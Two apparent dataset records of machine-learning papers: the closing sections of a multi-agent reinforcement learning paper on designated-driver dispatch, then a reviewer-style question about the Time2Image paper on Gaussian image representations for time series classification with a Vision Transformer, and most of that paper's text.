| MADDPG for 5 groups | 223.0 ± 3.6 | 24.5 ± 1.2 |
| MADDPG-RND for 5 groups | 211.5 ± 7.4 | 56.1 ± 1.8 |
| MAMFRL for 5 groups | 227.0 ± 10.2 | 6.1 ± 1.7 |
| RLD3 without window-lasting | 229.5 ± 3.2 | 27.1 ± 3.4 |
| RLD3 without state encoder | 232.2 ± 3.7 | 27.2 ± 1.6 |
| RLD3 without potential reward | 223.8 ± 3.8 | 6.7 ± 1.2 |
| RLD3 without move cost | 210.7 ± 6.7 | 48.3 ± 2.6 |

**State Encoder.** To capture the distribution information of orders and drivers during training, we employ an encoder on the system state. Because the numbers of orders and drivers vary, the dimension of the state vector changes constantly, making it difficult for the value function to use directly. We therefore extract the distribution information of orders and drivers separately using the K-Means method. As shown in Table 2, this state encoder helps DRL algorithms better understand the state of the designated driving platform, particularly in extracting driver-order distribution information. Moreover, even without the state encoder, our algorithm still outperforms the traditional DRL baselines that use only observation information, thanks to the group-sharing and window-lasting interaction techniques.

**Reward Design.** We compared different reward components by removing the neighborhood potential reward and the move cost, as shown in Table 2. All reward settings were tested with our proposed group-sharing structure and training process. The dense potential reward not only improves performance but also stabilizes the training process, as indicated by the much smaller value function loss.
Meanwhile, the model without the move cost falls into a suboptimal regime in which only order numbers are optimized and distance constraints are ignored.

5 CONCLUSION

In this paper, we addressed the problem of driver dispatch on designated driving platforms, a complex scenario with sparsity issues and strict constraints. To capture the spatiotemporal dynamics of imbalanced demand-supply relations, we proposed a novel multi-agent deep reinforcement learning (DRL) algorithm based on a decentralized partially observed Markov decision process (Dec-POMDP) formulation. Our algorithm leverages a group-sharing structure and a specially designed reward to balance the trade-off among sparsity, scalability, and heterogeneity, while the window-lasting agent interaction technique enables it to handle the long-lasting cross-effects of agents. Through extensive experiments on a simulator built from real-world data, we demonstrated that our algorithm outperforms traditional optimization-based policies and existing DRL algorithms in terms of completed order numbers and moving constraints. The results highlight the effectiveness of our approach in addressing the challenges of the designated driver dispatch problem.

In future work, we aim to make the grouping process trainable by incorporating self-supervised algorithms such as clustering, which would enable us to better model the interactions between agents and enhance the performance of our algorithm. We are also interested in studying the impact of non-compliance on the performance of driver dispatch, as the existing literature often assumes drivers' full compliance. Understanding and addressing non-compliance can further enhance the effectiveness of our algorithm in real-world scenarios.

ETHICS STATEMENT

During the data collection process, we filtered out all personal information regarding designated drivers and orders and used virtual IDs to prevent the leakage of behavior patterns. In the experimental design, we did not employ any discriminatory strategies towards any specific driver or order. Our optimization objective is to maximize the gross merchandise volume of the entire platform, thereby improving service quality while increasing workers' income.

REPRODUCIBILITY STATEMENT

To facilitate reproducibility, we provide a detailed description of the models and training details in the main text. We also list all relevant parameters in the appendix. If the paper is accepted, we will provide an open-source link in the camera-ready version.

REFERENCES

Lina Al-Kanj, Juliana Nascimento, and Warren B Powell. Approximate dynamic programming for planning a ride-hailing system using autonomous fleets of electric vehicles. *European Journal of Operational Research*, 284(3):1088–1106, 2020.

Yuri Burda, Harrison Edwards, Amos J. Storkey, and Oleg Klimov. Exploration by random network distillation. In *7th International Conference on Learning Representations, ICLR 2019, New Orleans, LA, USA, May 6-9, 2019*. OpenReview.net, 2019.

BusinessGrowthReport. Global designated driving service market research report 2022. [https://www.businessgrowthreports.com/TOC/22043825](https://www.businessgrowthreports.com/TOC/22043825), 2022.

Caroline Claus and Craig Boutilier. The dynamics of reinforcement learning in cooperative multiagent systems. In *Proceedings of the Fifteenth National/Tenth Conference on Artificial Intelligence/Innovative Applications of Artificial Intelligence, AAAI '98/IAAI '98*, pp. 746–752, USA, 1998.
Soheil Sadeghi Eshkevari, Xiaocheng Tang, Zhiwei Qin, Jinhan Mei, Cheng Zhang, Qianying Meng, and Jia Xu. Reinforcement learning in the wild: Scalable RL dispatching algorithm deployed in ridehailing marketplace. In *KDD ’22: The 28th ACM SIGKDD Conference on Knowledge Discovery and Data Mining, Washington, DC, USA, August 14 - 18, 2022*, pp. 3838–3848, 2022. Yannis Flet-Berliac and Philippe Preux. Only relevant information matters: Filtering out noisy samples to boost RL. In Christian Bessiere (ed.), *Proceedings of the Twenty-Ninth International Joint Conference on Artificial Intelligence, IJCAI 2020*. ijcai.org, 2020. Sriram Ganapathi Subramanian, Pascal Poupart, Matthew E. Taylor, and Nidhi Hegde. Multi type mean field reinforcement learning. In *Proceedings of the 19th International Conference on Autonomous Agents and MultiAgent Systems*, AAMAS ’20, pp. 411–419, Richland, SC, 2020. Guy Hacohen and Daphna Weinshall. On the power of curriculum learning in training deep networks. In Kamalika Chaudhuri and Ruslan Salakhutdinov (eds.), *Proceedings of the 36th International Conference on Machine Learning, ICML 2019, 9-15 June 2019, Long Beach, California, USA*, volume 97 of *Proceedings of Machine Learning Research*, pp. 2535–2544. PMLR, 2019. J. A. Hartigan and M. A. Wong. A k-means clustering algorithm. *Journal of the Royal Statistical Society: Series C (Applied Statistics)*, 28(1):100–108, 1979. Dan Hendrycks and Kevin Gimpel. Bridging nonlinearities and stochastic regularizers with gaussian error linear units. *CoRR*, abs/1606.08415, 2016. Eric Jang, Shixiang Gu, and Ben Poole. Categorical reparameterization with gumbel-softmax. In *5th International Conference on Learning Representations, ICLR 2017, Toulon, France, April 24-26, 2017, Conference Track Proceedings*. OpenReview.net, 2017.
LegZeFYugN
What are the authors' intuitions for why Time2Image underperforms the regular ResNet? Is there something about the Gaussian representation that is particularly suited to Transformers over Convolutional approaches?
TIME2IMAGE: A UNIFIED ADAPTIVE IMAGE REPRESENTATION FRAMEWORK FOR TIME SERIES CLASSIFICATION Anonymous authors Paper under double-blind review ABSTRACT Time Series Classification (TSC) is a crucial and challenging task across various domains, and one of its key ingredients is constructing a suitable time series representation for better feature capture. However, extracting an informative and robust time series representation with good generalization potential remains a challenging problem. To address this issue, we propose Time2Image, a novel image-based representation framework for TSC. At the heart of our framework is a proposed Adaptive Time Series Gaussian Mapping (ATSGM) module that robustly encodes time series in a 2D image structure, on top of which we employ a Vision Transformer (ViT) for the subsequent classification task, exploiting its prominent long-dependency modeling capability. Experiments were conducted on all 158 public time series datasets from UCR/UEA covering diverse domains, and our method achieves top-1 performance on 86 datasets compared with existing State-Of-The-Art (SOTA) deep learning-based methods. In addition, our framework flexibly handles both univariate and multivariate time series with unequal lengths across different domains and inherits strong generalization ability from the proposed ATSGM representation method. The source code will be made publicly available soon. 1 INTRODUCTION Time series classification (TSC) is recognized as a classic but challenging task in data mining (Esling & Agon, 2012). It aims to assign predefined labels to chronologically arranged data; depending on the number of channels per sample, the data are either Univariate Time Series (UTS) or Multivariate Time Series (MTS). TSC is widely applicable across diverse fields such as finance (Xiu et al., 2021; Chao et al., 2019), healthcare (Chambon et al., 2018), and transportation (Gupta et al., 2020). Over the past few years, TSC algorithms have fallen mainly into three categories: (i) Traditional machine learning models (Formisano et al., 2008; Bagnall et al., 2017) use various feature extraction techniques to capture statistical (Lin et al., 2012; Li et al., 2018), frequency (Baydogan et al., 2013), sequence (Chen et al., 2021), or shapelet (Ye & Keogh, 2009; Grabocka et al., 2014) features, combined with traditional classifiers (Xue et al., 2019) such as SVM and KNN. (ii) Deep learning models (Chen & Shi, 2019; Ruiz et al., 2021) learn features automatically through neural networks, achieving stronger expressive power than traditional methods; typical sequence models include RNNs and LSTMs, and especially Transformer-based models that use attention to capture long-term dependencies. (iii) Ensemble models (Lines et al.) integrate the results of multiple base classifiers to improve classification performance. However, existing algorithms are typically suitable for either UTS or MTS only, and they rely on heavy feature engineering and hyperparameter tuning, which introduces subjectivity into the model. Unlike the above models, which extract time series representations from the original time series data, increasing attention has recently been devoted to transformation-based time series representations (Bagnall et al., 2012).
These methods model time series data with specific data structures for informative feature extraction, among which time series image representation has become an active area in recent years, driven by the rapid development and achievements of image classification algorithms in computer vision (Chen & Shi, 2019). The motivation behind image representation is to convert time series into images so that effective pattern detection techniques and experience from image feature extraction can strengthen the expressive power of the data. However, current image representation methods suffer from poor generalization, in two respects: from the data perspective, current approaches are effective only on specific time series datasets or in certain domains; from the model perspective, existing image representation methods cannot be applied to both UTS and MTS. Even among the models that can be adopted for MTS, many cannot be used when the lengths of the time series are inconsistent. Therefore, our goal in this work is to propose a novel time series image representation framework that not only performs better overall than existing deep learning SOTA algorithms but also generalizes inherently to both UTS and MTS with inconsistent lengths. In this paper, we propose a unified adaptive image representation framework for time series classification called Time2Image. In our framework, Adaptive Time Series Gaussian Mapping (ATSGM) is first introduced to convert a time series into an image consisting of a collection of mixed Gaussian images, where the number of images equals the length of the time series. Each mixed Gaussian image is jointly constructed from a specific two-dimensional Gaussian distribution and the values of the time series at a certain time point. By casting the projection of the time series data as an 'equal circles in a square' problem, the optimal parameters of the Gaussian distribution and the position of each channel in the image can be obtained given the channel number and image size. The time series classification task is thereby converted into an image classification problem, and the Vision Transformer is adopted for its long-term dependency-capturing ability. This design builds a spatial structure for time series through image representations and generalizes to both UTS and MTS with unequal lengths. Overall, the contributions can be summarized as follows: - The Adaptive Time Series Gaussian Mapping (ATSGM) module is proposed for robust time series encoding in 2D images, and it generalizes to both UTS and MTS. - Adopting the Vision Transformer in Time2Image is, to our knowledge, the first attempt to apply ViT to a time series classification task. - We validate the effectiveness of our approach on all 158 public datasets from UCR/UEA. Experimental results show that our approach achieves notably superior performance compared with SOTA baselines. 2 RELATED WORK 2.1 TIME SERIES TRANSFORMATION METHODS With the accumulation of time series data in various domains, transforming time series into alternative representations has become crucial for advanced analysis tasks, as a way to improve the expressive power of the original data (Lacasa et al., 2015; Meintjes et al.). Graph-based transformation methods provide a flexible framework for capturing complex interrelationships and dependencies within a time series (Cheng et al., 2020).
Techniques such as the Visibility graph (Xiu et al., 2022), Recurrence network (Donges et al., 2012), and Transition network (Makaram et al., 2021) are available for time series modeling. Under this framework, graph theory and network science can be leveraged for downstream tasks, but constructing a graph is computationally expensive, especially for long time series. Symbolic sequence representations, meanwhile, simplify continuous time series into discrete symbols based on predefined rules. Methods like Symbolic Aggregate approXimation (SAX) (Senin & Malinchik, 2013) enable symbolic analysis, but they inevitably lose detailed information, and their parameter selection is subjective. Numerical transformations such as the Fourier Transform (Zhao et al., 2017) and Wavelet Transform (Chaovalit et al., 2011) apply mathematical operations to capture spectral components or multi-scale features, but the estimation and selection of suitable transformation functions can likewise be subjective. In addition to the above methods, image-based representation has gained popularity in recent years with the development of computer vision. Existing image-encoding methods (Li et al., 2021; Wang & Oates, 2015; Chen & Shi, 2019) for time series include the Gramian Angular Field (GAF), Markov Transition Field (MTF), and Recurrence Plots (RP), which capture phase relationships, recurrence patterns, and frequency-related features. Since a significant gap remains between existing time series image representation methods for classification and the SOTA models on the TSC task, we propose a new time series image representation method in this paper. 2.2 IMAGE CLASSIFICATION Various deep learning architectures have emerged as state-of-the-art models for image classification. Existing architectures fall into two categories: Convolutional Neural Network (CNN)-based models (Esling & Agon, 2012; Li et al., 2021) and Transformer-based models (Dosovitskiy et al., 2021). CNNs have revolutionized this field, achieving remarkable results by effectively capturing local spatial dependencies through convolutional layers and hierarchical features via pooling and stacking operations; ResNet (He et al., 2016) is a representative CNN-based model. More recently, attention mechanisms have gained traction in image classification research, and the emergence of ViT from Google in 2021 (Dosovitskiy et al., 2021) marked the entry of Transformer-based models into the field. However, ViT has not previously been applied to TSC tasks; given its strong long-range dependency modeling capability, it holds great potential for temporal data. In this work, by converting time series into images, we transform time series classification into image classification and utilize the Vision Transformer for the downstream task. 3 PRELIMINARY Let $\chi^N = \{X_d^N\}_{d=1}^{D}$ denote the $N$th multivariate time series with $D$ channels, where $X_d \in \mathbb{R}^{T}$ is the $d$th channel and $X_d = \{x_{d,1}, x_{d,2}, \ldots, x_{d,T}\}$. For every $\chi$, $D$ and $T$ denote the number of channels and the length of the time series, respectively.
Let $Y^N$ be the corresponding label of the $N$th time series sample, taking one of $K$ classes. All channels in $\chi^N$ share the same label $Y^N$. We take multivariate time series as the general definition covering both univariate and multivariate data, since a univariate time series is simply the special case with $D = 1$. In this study, we focus on time series classification by transforming the original time series into an image (Time2Image). Time2Image consists of two stages: Adaptive Time Series Gaussian Mapping (ATSGM) for image representation, followed by classification.

**Definition 1 Patch.** A patch is a small rectangular or square region extracted from the input image, mathematically represented as a matrix or a vector. It is a fundamental unit in computer vision and plays a vital role in local feature encoding and analysis. The shape and size of the patch are adaptable to the application and model; smaller patches reflect fine-grained details, while larger patches encompass a broader context. In this work, the patch $P_t$ is defined as the image representation of the time series at time $t$ and is a $16 \times 16$ matrix, since the classification model we adopt is ViT-B/16.

**Definition 2 Sub-patch.** A sub-patch is a subsection of the patch in Definition 1. For MTS, the image representation of the time series in one channel is a sub-patch, so the number of sub-patches of an MTS sample equals its number of channels. Accordingly, UTS can be regarded as a special case of MTS in which the sub-patch and the patch coincide.

4 TIME2IMAGE FRAMEWORK

In this section, a novel time series image representation framework is introduced for time series modeling. We name the proposed framework Time2Image, as it transforms a time series into an image. The framework is shown in Figure 1, which uses $D = 6$ as an example.

Figure 1: Time2Image Framework. (1) Pre-processing: standardization and resizing convert the MTS into an equal-length MTS with L = 196. (2) ATSGM: Gaussian mapping models the time series as a mixed Gaussian distribution for image representation. (3) The image generated by ATSGM is used for the image classification task.

4.1 DATA PREPROCESSING

Data preprocessing plays a critical role in preparing the time series data for classification. In this framework, preprocessing involves two techniques: standardization and resizing. For the time series of each channel in an MTS, standardization is first conducted separately to align the data to a common scale and distribution, ensuring that time series from different channels are comparable:
$$S_{d,t}^N = \frac{X_{d,t}^N - \mu_d^N}{\sigma_d^N}$$ (1)
where $\mu_d^N$ and $\sigma_d^N$ are the mean and standard deviation of channel $d$ of the time series, respectively. After that, cubic interpolation is applied to each channel to handle varying sequence lengths and create a consistent representation. Since the estimation is based on smooth cubic polynomials, it provides more accurate results than simpler schemes such as linear or quadratic interpolation, especially for complex time series with nonlinear variations.
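A minimal sketch of this preprocessing step (per-channel standardization as in Equation 1, followed by cubic resizing to a common length) is given below, assuming numpy and scipy; the function name and defaults are illustrative:

```python
import numpy as np
from scipy.interpolate import interp1d

def preprocess(x: np.ndarray, target_len: int = 196) -> np.ndarray:
    """Standardize each channel (Eq. 1), then resize it to `target_len`
    via cubic interpolation. `x` has shape (D, T); returns (D, target_len)."""
    mu = x.mean(axis=1, keepdims=True)
    sigma = x.std(axis=1, keepdims=True) + 1e-8   # guard against flat channels
    s = (x - mu) / sigma
    old_grid = np.linspace(0.0, 1.0, s.shape[1])  # cubic needs T >= 4
    new_grid = np.linspace(0.0, 1.0, target_len)
    return interp1d(old_grid, s, kind="cubic", axis=1)(new_grid)
```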
4.2 Adaptive Time Series Gaussian Mapping (ATSGM)

ATSGM is the crucial component of our proposed framework for time series image representation; it addresses the challenge of extracting informative and robust representations from time series data with the goal of better feature capture. Our goal is to obtain an image representation of the values of all channels at a given time. The overall process of ATSGM is shown in Figure 2: the time series values at a given time across different channels are transformed into a sequence of mixed Gaussian distributions ordered chronologically. These distributions are used to create sub-patch representations, where the mean and standard deviation of each Gaussian are derived mathematically from the number of channels of the MTS, as detailed in Section 4.2.1. The sub-patch representations are summed to obtain the patch representation of the time series at time $t$. All 196 patches are then arranged in chronological order into a $14 \times 14$ grid of $16 \times 16$ patches, forming the image representation of the MTS that serves as input to the image classification algorithm. The intuition behind ATSGM is to preserve the statistical properties of the time series through Gaussian distributions and to obtain a smooth two-dimensional representation. The following subsections give a detailed description of the method.

4.2.1 Time Series Image Representation

Existing research on image representation mainly considers relative values, obtained simply as differences between time steps. Here, we instead consider a two-dimensional Gaussian distribution whose off-diagonal covariance is zero by default and whose two standard deviations are equal. The projection of this Gaussian distribution onto the plane is therefore a circle whose radius equals the standard deviation of the distribution, and the means $\mu_x$ and $\mu_y$ can be regarded as the coordinates of the circle's center. The projected values of the 2D Gaussian distribution form the sub-patch matrix, which is predefined as a $16 \times 16$ matrix whose coordinates span $[-3, 3]$ (side length 6). The value of the underlying Gaussian distribution for the sub-patch matrix is obtained through the following equation.

Figure 2: Time series image representation. (a) Sub-patch: for pre-processed multivariate time series data, ATSGM produces the Gaussian mapping of each channel at a given time stamp. (b) Patch: the sub-patches from all channels at a given time stamp are summed to form the patch for that time stamp. (c) Image: the patches, combined with position encoding, are connected in chronological order to form the final image.

$$f(x, y) = \frac{1}{2\pi\sigma^2} \exp \left[ -\frac{(x - \mu_x)^2 + (y - \mu_y)^2}{2\sigma^2} \right]$$ (2)

where $f(x, y)$ is the matrix value at $(x, y)$, and $\mu_x$, $\mu_y$, and $\sigma$ are the means and the standard deviation of the distribution, respectively.
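As a concreteness check, a short numpy sketch of evaluating Equation 2 on the $16 \times 16$ sub-patch grid follows; the center and $\sigma$ are left as parameters, since they come from the circle-packing construction described next, and the example values at the bottom are illustrative:

```python
import numpy as np

def gaussian_subpatch(mu_x: float, mu_y: float, sigma: float, size: int = 16) -> np.ndarray:
    """Evaluate the isotropic 2D Gaussian of Eq. 2 on a size x size grid
    whose coordinates span [-3, 3]; returns the sub-patch base matrix f."""
    coords = np.linspace(-3.0, 3.0, size)
    xx, yy = np.meshgrid(coords, coords)
    sq = (xx - mu_x) ** 2 + (yy - mu_y) ** 2
    return np.exp(-sq / (2.0 * sigma ** 2)) / (2.0 * np.pi * sigma ** 2)

# Sub-patch of channel d at time t: V = f * S_{d,t} (Eq. 4). For UTS (D = 1),
# the circle is centered at the origin with R = 3, so e.g. sigma = R / 2 = 1.5.
V = 0.7 * gaussian_subpatch(0.0, 0.0, 1.5)   # 0.7 is an illustrative S_{d,t}
```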
Since the projection of the 2D Gaussian distribution is a circle in the plane, the relationship between the area of the circle and the standard deviation of the Gaussian can be written as:
$$S_{\text{circle}} = \pi R_D^2 = \pi \sigma^2$$ (3)
where $R_D$ is the radius of the circle in a $D$-channel time series; the radius thus equals the standard deviation of the 2D Gaussian distribution. The 'adaptive' in ATSGM refers to the adjustability of the standard deviation: representations carrying different amounts of information are obtained by setting different values of the standard deviation, and the smaller the standard deviation, the more of the Gaussian mapping is captured within the circle. Following the '3-sigma' rule, the correspondence between $R_D$ and the standard deviation is:

- When $\sigma = R_D$, about 68% of the information can be represented within the circle.
- When $\sigma = R_D/2$, about 95% of the information can be represented within the circle.
- When $\sigma = R_D/3$, about 99% of the information can be represented within the circle.

Therefore, the projection value $V_{d,t}$ of channel $d$ at time $t$ at coordinate $(x, y)$ of the sub-patch matrix is defined as:
$$V_{d,t}(x, y) = f(x, y) \times S_{d,t}$$ (4)
where $S_{d,t}$ is the preprocessed time series value of channel $d$ at time $t$. After computing all data points, the randomness of each channel's values is captured: we use the Gaussian distribution to describe the randomness of the value, scale the range and strength of the Gaussian distribution by multiplying it by the normalized time series value, and use the scaled distribution of each channel as its two-dimensional representation at each time step, which improves the stability and robustness of the method.

4.2.2 Sub-patch Position Determination

From the construction of ATSGM above, for UTS the optimal time series image representation is obtained when the center of the projected circle lies at the center of the sub-patch and its diameter equals the side length of the sub-patch. For MTS, however, the projection position of each channel must be determined first. Since the projection of each 2D Gaussian distribution is a circle in the plane, this can be cast as a packing problem: finding the best packing of equal circles in a square. The 'equal circles in a square' problem is a classic mathematical puzzle: given $N$ equal circles, find the largest common radius such that all $N$ circles fit inside a given square without overlapping. The website\footnote{http://hydra.nat.uni-magdeburg.de/packing/csq/csq.html} lists the best-known packings of equal circles in a square for N = 1 to 10000, including the optimal radius ($r_d$) and the corresponding coordinates ($c_d$) of each circle for a unit square. In our work, N equals the number of channels of the MTS.
Therefore, the radius and coordinates are obtained as:
$$R_d = r_d \times 6$$ (5)
$$C_d = (c_{dx} \times 6, c_{dy} \times 6)$$ (6)

With the optimal radius of each circle determined, the optimal parameters of the Gaussian distribution follow: $\mu_x$ and $\mu_y$ equal the coordinates in Equation 6, and the standard deviation is obtained through Equation 3. Once the parameters are determined, the Gaussian distribution of each sub-patch representation is fixed. The patch representation at time step $t$ is obtained by summing all sub-patch representations at that time step, as shown in Equation 7; the image representation is the chronological arrangement of the patches.
$$P_t(x, y) = \sum_d V_{d,t}(x, y)$$ (7)

The pseudo-code of ATSGM is given in Algorithm 1 for better understanding. Through the above steps, ATSGM converts time series data into an image representation with spatial structure. This representation better captures the characteristics of time series data, especially the local characteristics of different channels at the same time point, and provides more reliable input for subsequent image-based models.

**Algorithm 1 ATSGM**

**Input:** time series $X = [X^1, X^2, ..., X^D]$ consisting of $D$ channels with $X^d = [x_1^d, x_2^d, ..., x_T^d]$, where $x_i^d$ is the value of channel $d$ at time step $i$ and $T$ is the time series length
**Output:** a $224 \times 224$ matrix $N$
1: Resize the time series & normalize
2: For every channel, resize its length to 196: $X^{D \times T} \rightarrow X^{D \times 196}$
3: Transformation
4: Initialize $P$ as an empty matrix of shape $D \times 196 \times 16 \times 16$; generate the Gaussian matrix list $\Phi^{D \times 16 \times 16}$ according to the number of channels $D$
5: for $i \in D$ do
6: for $j \in L$ do
7: $P^i_j = X^i_j \cdot \Phi_i$
8: end for
9: end for
10: Reshape $P$
11: $P^{D \times 224 \times 224} \leftarrow P^{D \times 196 \times 16 \times 16}$
12: Sum $P$ over dimension 0
13: $P^{224 \times 224} \leftarrow P^{D \times 224 \times 224}$

4.3 Classification Model

The Vision Transformer is a classic Transformer-based image classification model proposed in 2021 (Dosovitskiy et al., 2021), prominent for its global feature extraction and long-dependency modeling capability afforded by multi-head attention. In our work, we adopt ViT-B/16 to perform the image classification task on the input produced by our proposed time series image representation.

5 Experiment

5.1 Experimental Setting

5.1.1 Datasets

The whole UCR/UEA archive (Chen et al., 2015) is utilized to test the performance of our proposed method. This archive is a well-known and widely used public benchmark for time series classification, containing 158 time series datasets in total covering different scenarios with predefined train/test splits: 128 UTS datasets and 30 MTS datasets. The number of classes ranges from 2 to 60, and 4 of the MTS datasets have unequal lengths across channels. A summary of these datasets is given in Appendix A, with detailed information including the sizes of the training and testing sets and the channel count, length, number of classes, and domain of each dataset. By testing our algorithm on all datasets and comparing it with the baseline models, its performance can be thoroughly assessed.
5.1.2 Baselines

Several comparison algorithms, including SOTA methods, are deployed to show the effectiveness of the proposed model. According to Ismail Fawaz et al. (2020), InceptionTime, FCN, and ResNet achieve top-1 performance on 69.4% of the UTS datasets in a comparison of 9 deep learning models, so these models are chosen as baselines for the UTS classification task. For MTS, we choose five state-of-the-art multivariate time series classification models as our baselines: the Hierarchical VoTE Collective of Transformation-based Ensembles (HIVE-COTE) (Lines et al., 2017), the Canonical Interval Forest (CIF) (Middlehurst et al., 2020), the RandOm Convolutional KErnel Transform (ROCKET) (Dempster et al., 2020), InceptionTime (Ismail Fawaz et al., 2020), and ResNet (He et al., 2016); HIVE-COTE, CIF, ROCKET, and InceptionTime were found to be more accurate than the other classifiers evaluated on the UEA archive by Ruiz et al. (2021). To show the effectiveness of ATSGM within our framework, we also conduct an experiment replacing the downstream classifier, swapping ViT for ResNet, to compare the two dominant classification architectures from computer vision.

5.1.3 Implementation

ViT-B/16 is adopted as the downstream classifier for the time series image representation, so all time series are resized to length 196 (L = 196). For MTS, we set the circle of each channel to encompass the information within a 2-standard-deviation range of the predefined 2D Gaussian distribution, that is, $\sigma = R/2$ as discussed in Section 4.2.1. We keep the original training/testing splits for all datasets, and all models are trained for 200 epochs. The hyperparameters of ViT are set to their defaults following Dosovitskiy et al. (2021). Each Time2Image experiment is replicated 5 times per dataset with random seeds 0, 1, 2, 3, and 4.

5.1.4 Evaluation Indicator

We use the average accuracy over the 5 replicate runs as the evaluation metric when comparing our proposed method against the baseline models.

5.2 Performance Analysis

We conducted extensive experiments on the whole UCR/UEA archive; the results are analyzed in this section. Due to page limitations, the classification accuracies on all datasets are fully disclosed in Appendix B. The corresponding critical difference diagrams, drawn from the per-dataset performance, compare the algorithms across multiple datasets and are shown in Figures 3 and 4.

Regarding the comparison between Time2Image and the baselines, our proposed framework achieves the best performance on both the UTS and MTS datasets, indicating its generalization ability. Moreover, Time2Image significantly outperforms the other baselines with an average rank of 1.8945 on the UTS datasets, winning on 73 problems out of 128 and significantly outperforming ResNet (Table 1). The MTS performance is likewise top-1 compared with the other baselines.
Table 1: Number of wins of each algorithm on the UTS and MTS datasets.

| Data Type | Total # | Time2Image | FCN | ResNet | ROCKET | CIF | HIVE-COTE | InceptionTime |
|-----------|---------|------------|-----|--------|--------|-----|-----------|---------------|
| UTS | 128 | 73 | 12 | 41 | – | – | – | – |
| MTS | 30 | 13 | – | 3 | 4 | 3 | 2 | 5 |

Figure 3: Critical difference diagram of the UTS datasets.

Since several time series image representation methods already exist, we also ran comparison experiments on different representations. GAF, MTF, and RP are widely adopted image representation methods for UTS, so we chose them for comparison; the results are shown in Figure 3. The figure shows that none of the existing image representation methods can defeat the baseline models, indicating a large research gap in time series representation for TSC, consistent with the current state of research. Our proposed method, by contrast, is significantly better than both the other image representation methods and all baselines, providing an alternative TSC algorithm and showing a promising direction for time series image representation.

Figure 4: Critical difference diagram of the MTS datasets.

In addition, to explore whether the choice of image classification model impacts performance, we also ran an experiment with ResNet, a typical CNN architecture, in place of ViT. According to the results in Figure 3, the ResNet variant of our framework is better than all other image representation models but not as good as the SOTA baselines, which illustrates the importance of long-range information for temporal classification and the superiority of ViT in capturing it. Nevertheless, our proposed ATSGM method still holds significant advantages over other image representation approaches for time series, which also attests to its effectiveness.

Table 2: Classification results grouped by domain.

| Category | Time2Image | FCN | ResNet | Time2Image_Win | FCN_Win | ResNet_Win |
|----------------|------------|-------|--------|----------------|---------|------------|
| Device(9) | **75.96%** | 70.91% | 71.16% | 4 | 3 | 2 |
| ECG(6) | 94.67% | 92.91% | **94.98%** | 2 | 1 | 3 |
| EOG(2) | **57.98%** | 42.85% | 55.06% | 1 | 0 | 1 |
| EPG(2) | 99.76% | **100.00%** | **100.00%** | 0 | 1 | 1 |
| Hemodynamics(3)| **83.32%** | 36.63% | 62.79% | 1 | 0 | 2 |
| HRM(1) | **99.68%** | 78.06% | 98.49% | 1 | 0 | 0 |
| Image(32) | **83.32%** | 78.16% | 82.89% | **17** | 1 | 14 |
| Motion(17) | **81.99%** | 78.03% | 81.91% | 8 | 2 | 7 |
| Power(1) | **98.22%** | 90.00% | 88.89% | 1 | 0 | 0 |
| Sensor(30) | **84.26%** | 60.73% | 63.73% | **21** | 1 | 8 |
| Simulated(8) | 94.91% | 88.79% | **98.14%** | 4 | 3 | 1 |
| Spectro(8) | **84.67%** | 66.80% | 81.13% | 5 | 0 | 3 |
| Spectrum(4) | **79.89%** | 52.44% | 62.28% | 4 | 0 | 0 |
| Traffic(2) | **94.36%** | 54.06% | 54.03% | 2 | 0 | 0 |
| Trajectory(3) | **59.90%** | 55.61% | 56.33% | 2 | 0 | 1 |

To assess whether Time2Image can be regarded as a unified framework, we also group performance by domain to examine the generalization of the model. Table 2 shows the algorithms' performance with respect to the domain of the datasets, using the domains defined by Bagnall et al. (2017) for the UTS datasets.
The table shows that the 128 datasets fall into 15 domains. The first three columns report the average accuracy of Time2Image and the baselines within each domain, and the remaining columns count the number of winning datasets for each model. Time2Image achieves top-1 performance on 12 out of 15 domains, indicating the inherent generalization ability of Time2Image.

5.3 Parameter Analysis

Our method is adaptive, meaning that its parameters, especially the standard deviation ($\sigma$) of the Gaussian distribution, may affect performance. To explore the influence of the standard deviation, we record the accuracy on all datasets under different standard deviation values, reported in Appendix C. We then average these values over the whole collection of datasets to summarize the final performance; the results are shown in Figure 5. The model performs best when $\sigma = \frac{R}{2}$, but the differences are small, with an average variance of 0.37, indicating the robustness of our proposed algorithm.

6 Conclusion

In this work, a general time series image representation algorithm (Time2Image) was proposed; it is not only suitable for both UTS and MTS but also handles non-stationary and unequal-length data well. We validated the effectiveness of our approach on all 158 public datasets from UCR/UEA. Through extensive experiments, our approach achieves notably better performance when compared with SOTA baselines, offering a promising direction for future time series image representation.

ACKNOWLEDGMENTS

We would like to express our sincere gratitude to all the reviewers and the public for their time and interest in our work. We welcome all valuable feedback and suggestions on our paper, as any insightful comments and constructive critiques can make this paper better.

REFERENCES

Anthony Bagnall, Luke Davis, Jon Hills, and Jason Lines. Transformation based ensembles for time series classification. In Proceedings of the 2012 SIAM International Conference on Data Mining (SDM), Proceedings, pp. 307–318. Society for Industrial and Applied Mathematics, 2012. doi: 10.1137/1.9781611972825.27.

Anthony Bagnall, Jason Lines, Aaron Bostrom, James Large, and Eamonn Keogh. The great time series classification bake off: a review and experimental evaluation of recent algorithmic advances. Data Mining and Knowledge Discovery, 31(3):606–660, 2017.

Mustafa Gokce Baydogan, George Runger, and Eugene Tuv. A bag-of-features framework to classify time series. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(11):2796–2802, 2013.

Stanislas Chambon, Mathieu N. Galtier, Pierrick J. Arnal, Gilles Wainrib, and Alexandre Gramfort. A deep learning architecture for temporal sleep stage classification using multivariate and multimodal time series. IEEE Transactions on Neural Systems and Rehabilitation Engineering, 26(4):758–769, 2018.

Luo Chao, Jiang Zhipeng, and Zheng Yuanjie. A novel reconstructed training-set SVM with roulette cooperative coevolution for financial time series classification. Expert Systems with Applications, 123:283–298, 2019.

Pimwadee Chaovalit, Aryya Gangopadhyay, George Karabatis, and Zhiyuan Chen.
